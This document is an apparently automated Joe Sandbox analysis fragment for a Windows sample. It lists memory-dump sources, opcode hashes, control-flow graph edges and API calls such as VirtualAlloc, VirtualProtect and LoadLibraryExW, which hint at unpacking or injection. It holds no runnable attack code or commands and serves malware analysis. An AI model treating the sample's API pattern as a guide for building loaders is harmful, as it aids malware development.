                                              • Opcode ID: bd5f065f21ca9dfaf276aafb9f9b2438a7b44c91aae38290b6245acc0b73236d
                                              • Instruction ID: c3650a310929407547f4138fb66f39455ffdc967ed73a0e89607860f0e282bb6
                                              • Opcode Fuzzy Hash: bd5f065f21ca9dfaf276aafb9f9b2438a7b44c91aae38290b6245acc0b73236d
                                              • Instruction Fuzzy Hash: F6A13A74D01208DFDB58DFA6E444B9DBBF2FF88315F10A16AE409A72A5DB746985CF00
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dab0d97c8b744ede7b1c1f83815f710667435d295712548d64b89778fab5614a
                                              • Instruction ID: b0a958b2740d2004b801b9ad48a394129ff8a371b80544c93f1b771115537bf6
                                              • Opcode Fuzzy Hash: dab0d97c8b744ede7b1c1f83815f710667435d295712548d64b89778fab5614a
                                              • Instruction Fuzzy Hash: B4A11874E01208DFDB58DFA6E444B9DBBF2FF88315F10A06AD409A72A5DB746985CF00

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 421 6461070-64610b5 426 64610bb-64610bd 421->426 427 6461189-646119c 421->427 428 64610c0-64610cf 426->428 431 6461234-646123f 427->431 432 64611a2-64611b1 427->432 433 64610d1-64610fe 428->433 434 6461129-646112d 428->434 435 6461247-6461250 431->435 441 64611b3-64611dc 432->441 442 64611ff-6461203 432->442 457 6461104-6461106 433->457 436 646112f-646113a 434->436 437 646113c 434->437 439 6461141-6461144 436->439 437->439 439->435 446 646114a-646114e 439->446 465 64611f4-64611fd 441->465 466 64611de-64611e4 441->466 444 6461205-6461210 442->444 445 6461212 442->445 447 6461214-6461216 444->447 445->447 448 6461150-646115b 446->448 449 646115d 446->449 453 6461267-6461284 447->453 454 6461218-6461222 447->454 455 646115f-6461161 448->455 449->455 481 6461286-6461292 453->481 482 6461298-64612af 453->482 468 6461225-646122e 454->468 459 6461167-6461171 455->459 460 6461253-6461260 455->460 463 646111e-6461127 457->463 464 6461108-646110e 457->464 475 6461174-646117e 459->475 460->453 463->475 469 6461112-6461114 464->469 470 6461110 464->470 465->468 471 64611e6 466->471 472 64611e8-64611ea 466->472 468->431 468->432 469->463 470->463 471->465 472->465 475->428 478 6461184 475->478 478->435 481->482 484 64612c7-64612e9 482->484 485 64612b1-64612b7 482->485 490 64612ec-64612f0 484->490 486 64612bb-64612bd 485->486 487 64612b9 485->487 486->484 487->484 491 64612f2-64612f7 490->491 492 64612f9-64612fe 490->492 493 6461304-6461307 491->493 492->493 494 646130d-6461322 493->494 495 64614f8-6461500 493->495 494->490 497 6461324 494->497 498 64613e0-6461405 497->498 499 646132b-6461350 497->499 500 6461498-64614b9 497->500 510 6461407-6461409 498->510 511 646140b-646140f 498->511 512 6461356-646135a 499->512 513 6461352-6461354 499->513 504 64614bf-64614f3 500->504 504->490 515 646146d-6461493 510->515 516 6461430-6461453 511->516 517 6461411-646142e 511->517 519 646135c-6461379 512->519 520 646137b-646139e 512->520 518 64613b8-64613db 513->518 515->490 534 6461455-646145b 516->534 535 646146b 516->535 517->515 518->490 519->518 536 64613b6 520->536 537 64613a0-64613a6 520->537 538 646145f-6461461 534->538 539 646145d 534->539 535->515 536->518 540 64613aa-64613ac 537->540 541 64613a8 537->541 538->535 539->535 540->536 541->536
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                              • API String ID: 0-3377385791
                                              • Opcode ID: 35cdff791623707b4494c691ef36c992d295327b628edfa4aa227b6b04f91e82
                                              • Instruction ID: d740b58e33119b5a5d3120b96dccf3206b03b214ade61e89d0ae6d8dc2ad78a2
                                              • Opcode Fuzzy Hash: 35cdff791623707b4494c691ef36c992d295327b628edfa4aa227b6b04f91e82
                                              • Instruction Fuzzy Hash: 1FD1D530B002059FDB459BAEC854A6BBBE6EF89700B10856AF517DB796CF70DC41CB92

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 631 6461ba0-6461bc3 632 6461bc5-6461bc7 631->632 633 6461bd1-6461c2d 631->633 632->633 638 6462056-646209e 633->638 639 6461c33-6461c69 633->639 645 64620b6-6462119 638->645 646 64620a0-64620a6 638->646 639->638 650 6461c6f-6461ca5 639->650 664 6462ea1-6462ee8 645->664 665 646211f-6462139 645->665 648 64620aa-64620b4 646->648 649 64620a8 646->649 648->645 649->645 650->638 659 6461cab-6461ce2 650->659 659->638 669 6461ce8-6461d1e 659->669 674 6462f00-6462f78 664->674 675 6462eea-6462ef0 664->675 665->664 670 646213f-646216f 665->670 669->638 684 6461d24-6461d5a 669->684 686 6462171-6462187 670->686 687 6462189-64621d5 670->687 701 6462fa2-6462fa9 674->701 702 6462f7a-6462fa0 674->702 677 6462ef4-6462efe 675->677 678 6462ef2 675->678 677->674 678->674 684->638 700 6461d60-6461d9e 684->700 696 64621dc-64621f9 686->696 687->696 696->664 705 64621ff-6462235 696->705 700->638 713 6461da4-6461ded 700->713 702->701 716 6462237-646224d 705->716 717 646224f-646229b 705->717 713->638 731 6461df3-6461e29 713->731 724 64622a2-64622bf 716->724 717->724 724->664 728 64622c5-64622fb 724->728 738 6462315-6462361 728->738 739 64622fd-6462313 728->739 731->638 740 6461e2f-6461e65 731->740 747 6462368-6462385 738->747 739->747 740->638 753 6461e6b-6461ea1 740->753 747->664 752 646238b-64623c1 747->752 760 64623c3-64623d9 752->760 761 64623db-6462427 752->761 753->638 762 6461ea7-6461edd 753->762 769 646242e-646244b 760->769 761->769 762->638 773 6461ee3-6461efa 762->773 769->664 774 6462451-6462487 769->774 773->638 778 6461f00-6461f32 773->778 783 64624a1-64624f9 774->783 784 6462489-646249f 774->784 787 6461f34-6461f5a 778->787 788 6461f5c-6461f9e 778->788 794 6462500-646251d 783->794 784->794 803 6461fce-6462001 787->803 807 6461fa0-6461fb6 788->807 808 6461fbc-6461fc8 788->808 794->664 802 6462523-6462559 794->802 813 6462573-64625d1 802->813 814 646255b-6462571 802->814 803->638 815 6462003-6462039 803->815 807->808 808->803 822 64625d8-64625f5 813->822 814->822 815->638 827 646203b-6462053 815->827 822->664 826 64625fb-6462631 822->826 833 6462633-6462649 826->833 834 646264b-64626a9 826->834 839 64626b0-64626cd 833->839 834->839 839->664 843 64626d3-6462709 839->843 847 6462723-6462781 843->847 848 646270b-6462721 843->848 853 6462788-64627a5 847->853 848->853 853->664 857 64627ab-64627c5 853->857 857->664 859 64627cb-64627fb 857->859 863 6462815-6462873 859->863 864 64627fd-6462813 859->864 869 646287a-6462897 863->869 864->869 869->664 872 646289d-64628b7 869->872 872->664 875 64628bd-64628dd 872->875 878 64628e5-64628ed 875->878 879 6462907-6462965 878->879 880 64628ef-6462905 878->880 885 646296c-6462989 879->885 880->885 885->664 889 646298f-64629a9 885->889 889->664 891 64629af-64629df 889->891 895 64629e1-64629f7 891->895 896 64629f9-6462a57 891->896 901 6462a5e-6462a7b 895->901 896->901 901->664 905 6462a81-6462ab7 901->905 909 6462ad1-6462b2f 905->909 910 6462ab9-6462acf 905->910 915 6462b36-6462b53 909->915 910->915 915->664 918 6462b59-6462b8f 915->918 923 6462b91-6462ba7 918->923 924 6462ba9-6462c07 918->924 929 6462c0e-6462c2b 923->929 924->929 929->664 933 6462c31-6462c67 929->933 937 6462c81-6462cdf 933->937 938 6462c69-6462c7f 933->938 943 6462ce6-6462d03 937->943 938->943 943->664 947 6462d09-6462d3f 943->947 951 6462d41-6462d57 947->951 952 6462d59-6462db7 947->952 957 6462dbe-6462ddb 951->957 952->957 957->664 961 6462de1-6462e13 957->961 965 6462e15-6462e2b 961->965 966 6462e2d-6462e82 961->966 971 6462e89-6462e9e 965->971 966->971
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: W
                                              • API String ID: 0-655174618
                                              • Opcode ID: f86b0d9ce559e90245f3fef0d495a57fd9b526be8e145f2ce726c21027ff6874
                                              • Instruction ID: a9bc81ae1b1ab4ed9769801ef39b75af5b21fc98b7dbd2a237e9aa14c6a592cb
                                              • Opcode Fuzzy Hash: f86b0d9ce559e90245f3fef0d495a57fd9b526be8e145f2ce726c21027ff6874
                                              • Instruction Fuzzy Hash: B1C25270B40118AFCB55DF64C851A9EBBB6FF88704F10809AE906AB3A5DB71EE41CF51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1266 511c3a0-511da34 CreateActCtxA 1271 511da36-511da3c 1266->1271 1272 511da3d-511dac2 1266->1272 1271->1272 1281 511dac4-511dae7 1272->1281 1282 511daef-511daf7 1272->1282 1281->1282
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 0511DA21
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154991532.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_5100000_in.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 44a1880230919abd42d952f24ddd98d3a0966972e8324b723cbc7e1b27a1851d
                                              • Instruction ID: a7c1972e51e045f07244a39fe3bfb6e5daedb2bfab8681ceb4b6192286afd213
                                              • Opcode Fuzzy Hash: 44a1880230919abd42d952f24ddd98d3a0966972e8324b723cbc7e1b27a1851d
                                              • Instruction Fuzzy Hash: 2D51E5B0D04218CFDB24DFA8C840BDEBBF5AF49300F1080AA9509AB211DB716A89CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1354 27ad488-27ae604 1356 27ae618-27ae66a LoadLibraryExW 1354->1356 1357 27ae606-27ae615 1354->1357 1358 27ae66c-27ae672 1356->1358 1359 27ae673-27ae6b1 1356->1359 1357->1356 1358->1359
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(?,?,?), ref: 027AE65A
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2139680012.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_27a0000_in.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 1deeebaf54e48403c0de1684edbc45c55a26139f3702f6c49a888ae918bc7b78
                                              • Instruction ID: 950404d511b7d92a83c8c03f17f337a11cc766d2e1bf616b04ce6f1e23af6727
                                              • Opcode Fuzzy Hash: 1deeebaf54e48403c0de1684edbc45c55a26139f3702f6c49a888ae918bc7b78
                                              • Instruction Fuzzy Hash: EF4198B8D00258DFCB10CFA9D884A9EFBF1BB49310F14946AE818B7310D334A945CF94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1363 e5f000-e5f0b4 VirtualProtect 1366 e5f0b6-e5f0bc 1363->1366 1367 e5f0bd-e5f105 1363->1367 1366->1367
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00E5F0A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2139414724.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_e50000_in.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 3ee62a8045b1f6a0675e589628c1f397aade9d55c3885bd3079f06f924c41640
                                              • Instruction ID: 98ae82d6bb5007587195fb4e38738aad510251459a084013b0737239d16a2dce
                                              • Opcode Fuzzy Hash: 3ee62a8045b1f6a0675e589628c1f397aade9d55c3885bd3079f06f924c41640
                                              • Instruction Fuzzy Hash: 6F31A7B9D012489FCF14CFA9D984ADEFBB0BF49310F24A42AE819B7210D735A945CF54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1372 27ae2b8-27ae309 1373 27ae30b-27ae31a 1372->1373 1374 27ae31d-27ae35a GetModuleHandleW 1372->1374 1373->1374 1375 27ae35c-27ae362 1374->1375 1376 27ae363-27ae391 1374->1376 1375->1376
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(?), ref: 027AE34A
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2139680012.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_27a0000_in.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 78a7c19991899aedce8e60193329fb93fce2e5dea2d6fcd963fe0b04f98643e3
                                              • Instruction ID: 915c60ed942aade52190ba584272609f27f8b960b6e5a37735a1f7edfb8c4de9
                                              • Opcode Fuzzy Hash: 78a7c19991899aedce8e60193329fb93fce2e5dea2d6fcd963fe0b04f98643e3
                                              • Instruction Fuzzy Hash: 933199B4D002599FCB14CFAAD984ADEFBF5AB89314F14906AE818B7320D334A945CF65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8gq
                                              • API String ID: 0-1984363304
                                              • Opcode ID: 539c62960476aaf3b3ba781c25dc901f0972c3d66845af9c5e167bbc95a252fa
                                              • Instruction ID: f5c8fe844be82200e813a82fd2eef24fb3516b49d4dd3c86a62d89eb2c3baf2d
                                              • Opcode Fuzzy Hash: 539c62960476aaf3b3ba781c25dc901f0972c3d66845af9c5e167bbc95a252fa
                                              • Instruction Fuzzy Hash: 344113B4D00208EFDB00CFA9E584BEDBBF2FB48314F00A569E415A7290D7B56A86CF40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8gq
                                              • API String ID: 0-1984363304
                                              • Opcode ID: 3dd86fad410d8a0b29e41c5eba312ddabbd3a0dda8a8454917690063fb7d6740
                                              • Instruction ID: 443a20e75cbbacf87b980a929ea2966159e0157e87c275279265e8408847982a
                                              • Opcode Fuzzy Hash: 3dd86fad410d8a0b29e41c5eba312ddabbd3a0dda8a8454917690063fb7d6740
                                              • Instruction Fuzzy Hash: 2E4115B4E01208EFDB00DFA9E544BEDBBF2FB48314F00A569E405A7690D7B56A85CF50
                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 027A0337
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2139680012.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_27a0000_in.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 7c3a6df7f07f419649f2f9bc365f92f5e0044240d9522507f43445e33901b700
                                              • Instruction ID: 00d65ca061848704368c2a89da2817b35c62d02f05db26c6c66e251999346b02
                                              • Opcode Fuzzy Hash: 7c3a6df7f07f419649f2f9bc365f92f5e0044240d9522507f43445e33901b700
                                              • Instruction Fuzzy Hash: 0131DBB5D042489FCF14CFA9D884ADEFBB1AF49310F20942AE815B7210D735A946CF54
                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 027A0337
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2139680012.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_27a0000_in.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 901ff3e6565aa548c687ce79ec46bb85940c4390b624d7b73ad1d0e46b912bad
                                              • Instruction ID: 4432861ba6c134a7c0af85c586bd3952fee7d27392b927f73777ee799c534c3a
                                              • Opcode Fuzzy Hash: 901ff3e6565aa548c687ce79ec46bb85940c4390b624d7b73ad1d0e46b912bad
                                              • Instruction Fuzzy Hash: AA31B8B9D042489FCF14CFA9D884ADEFBB1BF49320F20942AE815B7210C735A945CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq
                                              • API String ID: 0-182294849
                                              • Opcode ID: 5aa3d17ad05ae64d310ca34610385ca1e05c221cabac3dafc59a08c5d17fc648
                                              • Instruction ID: a2d543aa50d2629f02c1a3fc4f99adb06fcf218e422166d51ae84cde950ea06a
                                              • Opcode Fuzzy Hash: 5aa3d17ad05ae64d310ca34610385ca1e05c221cabac3dafc59a08c5d17fc648
                                              • Instruction Fuzzy Hash: 7FC01231210428479A296A2579595ED33F3FFC86103150AAEF40257645CE545D4B42C5
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00ba5d688681ed1baf3c29284205cb132d7463b386537915d4a5a316089b513b
                                              • Instruction ID: 61c4c82071a92595690d4e709e4eca22d793cdd57cc79a58fac2940be87e2623
                                              • Opcode Fuzzy Hash: 00ba5d688681ed1baf3c29284205cb132d7463b386537915d4a5a316089b513b
                                              • Instruction Fuzzy Hash: 2F4268347006158FCB65ABA89850A2EBBF2FFC5B01B104A5DE5039B795CF75EC058BC6
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6ed9386d5a0d4268b93d459a518789f5d5f9528e6a3bbfd48370ffc6da25d42
                                              • Instruction ID: a8f8886e2daa6be8a5ea32f897ed1765075d189015b82d6ce7ff4f9718353142
                                              • Opcode Fuzzy Hash: e6ed9386d5a0d4268b93d459a518789f5d5f9528e6a3bbfd48370ffc6da25d42
                                              • Instruction Fuzzy Hash: 2EC1A134B002049FEB45AB65C955B6A7BE6FFC9B05F008056E902DB3A5CF71EC41CB92
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8db52a71f28d923e3cc5aff2b4cc7bc893dbbad191055529826c1a92598e6774
                                              • Instruction ID: 620e368b13d99a22210e131eb79b2aa5f2532f34746c97db989c8a076bafb9f9
                                              • Opcode Fuzzy Hash: 8db52a71f28d923e3cc5aff2b4cc7bc893dbbad191055529826c1a92598e6774
                                              • Instruction Fuzzy Hash: C5B1A334B002009FEB85AB65C955B7A77E6FFC9B05F009056E9029B7A5CFB1EC41CB92
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dee2562515f847218ec2450e655e33511ec60added485f8711ebfba85925cae3
                                              • Instruction ID: 23c213f93626e54c07beacce6154d8a659b93d037a8e4802f01e824a7b6ff2a1
                                              • Opcode Fuzzy Hash: dee2562515f847218ec2450e655e33511ec60added485f8711ebfba85925cae3
                                              • Instruction Fuzzy Hash: 6FB1A3387002009FEB85AB65C955B7A77E6FFC9B05F009056E9029B7A5CFB1EC41CB92
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f616fa27cb96831321531adfd1de97806e7dbac34aa8b2fb8d7fb0cb7f0bf80
                                              • Instruction ID: c84a8d4fba8d0ae065020201da548e454ca0a60ce7a861682bbbb7bb44419e1a
                                              • Opcode Fuzzy Hash: 0f616fa27cb96831321531adfd1de97806e7dbac34aa8b2fb8d7fb0cb7f0bf80
                                              • Instruction Fuzzy Hash: C3B1B3387002009FEB45AB65C955B7A77E6FFC9B05F009056E6029B7A5CFB1EC41CB92
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9e836dfe6ee0fbb58046b44831c14f727b9eefa53ebf8f03312448cff22601f
                                              • Instruction ID: 0dad85e652b50b7c4bb54b41cbd9b490839612fbacd0d186f78ee180b43567ff
                                              • Opcode Fuzzy Hash: b9e836dfe6ee0fbb58046b44831c14f727b9eefa53ebf8f03312448cff22601f
                                              • Instruction Fuzzy Hash: FAB1C274E04229CFDB20CFA5C884BEDBBF1BB49314F10A2A9D509A7295E7746D86CF01
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d473d2df64d6e901247fb8eec58b859524428a020073a0bd17821884071fc698
                                              • Instruction ID: 7d53ee4e629bf11692aafc3f355c3f2c07bfa15e2f7f48da0d5f57f284619605
                                              • Opcode Fuzzy Hash: d473d2df64d6e901247fb8eec58b859524428a020073a0bd17821884071fc698
                                              • Instruction Fuzzy Hash: 53A16C746002068FC705DF78D884D59BBF2FF883107248AA9E54A9B766CB34FD86CB90
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 44f0811f398a6dbc6d305c0cff0a45dcfb03127f94e15f280b7cf5eddec62627
                                              • Instruction ID: b7905c45082808f4782044eb96f25510972804c33db7cb32cc0aab86f450c238
                                              • Opcode Fuzzy Hash: 44f0811f398a6dbc6d305c0cff0a45dcfb03127f94e15f280b7cf5eddec62627
                                              • Instruction Fuzzy Hash: 2D514835B102099FCB44CF6AC88499EBBB2FF89310B11806AF906EB365DB71ED05CB51
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5559c1c872084bf3313a789c333d80efd787ed2805416ac5c2129d7594d4021c
                                              • Instruction ID: 02b91514333199947535f90786a0c7d76456430909a415c2d6b65d5807a5299f
                                              • Opcode Fuzzy Hash: 5559c1c872084bf3313a789c333d80efd787ed2805416ac5c2129d7594d4021c
                                              • Instruction Fuzzy Hash: 41514835B102099FCB54CF69C88499EBBF2FF89314B1580AAF906AB361DB30EC05CB51
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 289e36f445dcb1e4634cfc66da65430e35832e35076a1bcffc528942c2538c6a
                                              • Instruction ID: 53e67ce5ec4fac2a5ad2b3a7b6740ace4a54ef6760e2b7b5a6c69ab9e98ee677
                                              • Opcode Fuzzy Hash: 289e36f445dcb1e4634cfc66da65430e35832e35076a1bcffc528942c2538c6a
                                              • Instruction Fuzzy Hash: 3F515A74B001049FC746DF59C994D6FBBBAEF8A710B1180A6F606DB3A6CA71DD01CB62
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4af9e80bfa740ec9248a9ee0c0c7ab725b063b942e8258b9ad8dabdac637710a
                                              • Instruction ID: c2ff7119a7586cbe6bbb4a4c528bf2146dc7c2912c3dfb2022aa66f027e41e2c
                                              • Opcode Fuzzy Hash: 4af9e80bfa740ec9248a9ee0c0c7ab725b063b942e8258b9ad8dabdac637710a
                                              • Instruction Fuzzy Hash: 4431A174F002059FCB41AF69DC549AABBF6EF88310B10516BE516D73A2DA30CC01CBA1
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2156245074.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_6460000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0537d41fba58e61d31ad4e094571edce10430361273155e74b34e50de2cef64e
                                              • Instruction ID: 49db9fc55405ec7b75a66210d9240f755a1f1883f22af9ed0658d7ba27ccff56
                                              • Opcode Fuzzy Hash: 0537d41fba58e61d31ad4e094571edce10430361273155e74b34e50de2cef64e
                                              • Instruction Fuzzy Hash: D02106307042449FCB459BAEDC109ABBBFAEFC9210715816BE516DB7A2CB30DC10C7A2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca02c22c6266b19551f790180f7d3e6e6a2d3991a18eb9047d462e1fb317f037
                                              • Instruction ID: da31a8c65675a591b48784e12fac857838e585f894e7f0721f9dcdd877b87445
                                              • Opcode Fuzzy Hash: ca02c22c6266b19551f790180f7d3e6e6a2d3991a18eb9047d462e1fb317f037
                                              • Instruction Fuzzy Hash: 2931E5B8E002089FCB04DFA9D8549EEBBB2FF88311F10806AE915B73A4DB355941CF91
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2154666537.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4e70000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9410943d38611bdd95e3c2fbdb3518b5a06fabbfe2d1171900a251b44c73df5
                                              • Instruction ID: c71a988a61251b29319595ce6e65de4cb47855e991959c3e198007cda2433981
                                              • Opcode Fuzzy Hash: d9410943d38611bdd95e3c2fbdb3518b5a06fabbfe2d1171900a251b44c73df5
                                              • Instruction Fuzzy Hash: DC3145B8E00219EFDB04DFAAD8446EEBBF2FB88311F109465D406A7654E7746A42CF91
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2139205141.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_e0d000_in.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
